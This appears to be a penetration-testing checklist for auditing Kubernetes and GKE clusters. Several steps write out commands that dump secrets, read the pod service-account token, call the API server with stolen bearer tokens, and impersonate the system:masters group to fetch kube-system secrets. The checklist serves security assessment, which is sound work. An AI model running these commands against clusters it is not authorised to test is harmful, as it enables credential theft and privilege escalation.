Skip to content

Process

Inventory

  1. [GKE] gcloud info 
    $ gcloud container clusters list
$ gcloud container clusters describe applications
  2. Get inventory: get namespaces, describe cluster and nodes 
    $ kubectl cluster-info
$ kubectl get config view
$ kubectl get secrets -o yaml
$ kubectl get all

Review Docker

  1. Check containers running as privileged user 
    $ kubectl get pods
$kubectl exec -it <name> -- /bin/bash
# id
  2. Review images for vulnerabilities (trivy)

Review Kubernetes

  1. Check if Internet exposed 
    $ kubectl cluster-info
$ curl https://x.x.x.x --insecure
  2. Checks whether Kubernetes is deployed according to CIS (kubebench) 
    $ kubebench-master
$ kubebench-node
  3. Hunt for security weaknesses in Kubernetes clusters (starboard, kubehunter, kubeaudit, mkit)
  4. Try insecure port 
    $ docker inspect kube-apiserver | jq -e '.[0].Args[] | match("--insecureport=0").string'
  5. Try anonymous auth 
    $ APISERVER=$(kubectl config view --minify | grep server | cut -f 2- -d ":" | tr -d " ")
$ curl $APISERVER/pods --insecure
  6. Try to auth to the API server 
    $ APISERVER=$(kubectl config view --minify | grep server | cut -f 2- -d ":" | tr -d " ")
$ TOKEN=$(kubectl describe secret $(kubectl get secrets        \
    | grep ^default | cut -f1 -d ' ') | grep -E '^token' | cut -f2 -d':' | tr -d " ")
$ curl $APISERVER/api --H "Authorization: Bearer $TOKEN" --insecure
  7. Try to get to secrets 
    $ kubectl get pods
$ kubectl exec -it <name> -- /bin/bash
# cat /var/run/secrets/kubernetes.io/serviceaccount/token
  8. Try to get secrets (with curl) 
    $ curl -v -H "Authorization: Bearer <jwt_token>"
    https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
  9. Impersonate a privileged account 
    $ curl -k -v -XGET
    -H "Authorization: Bearer <JWT TOKEN of impersonator)>" 
    -H "Impersonate-Group: system:masters"
    -H "Impersonate-User: null" 
    -H "Accept: application/json"
    https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
  10. Compromised container (see page: Compromised Container)
  11. Create over-privileged service account (see page: Create Over-Privileged Service Accounts)
  12. Review RBAC
  13. Review theory
    • Secure Deployment Guidelines
    • Authn/Authz
    • Network Policies
    • Kubelet (see page: Kubelet Exploit)
  14. Manual testing (kubectl)
  15. Review integration with cloud providers (metadata, kubeletmein)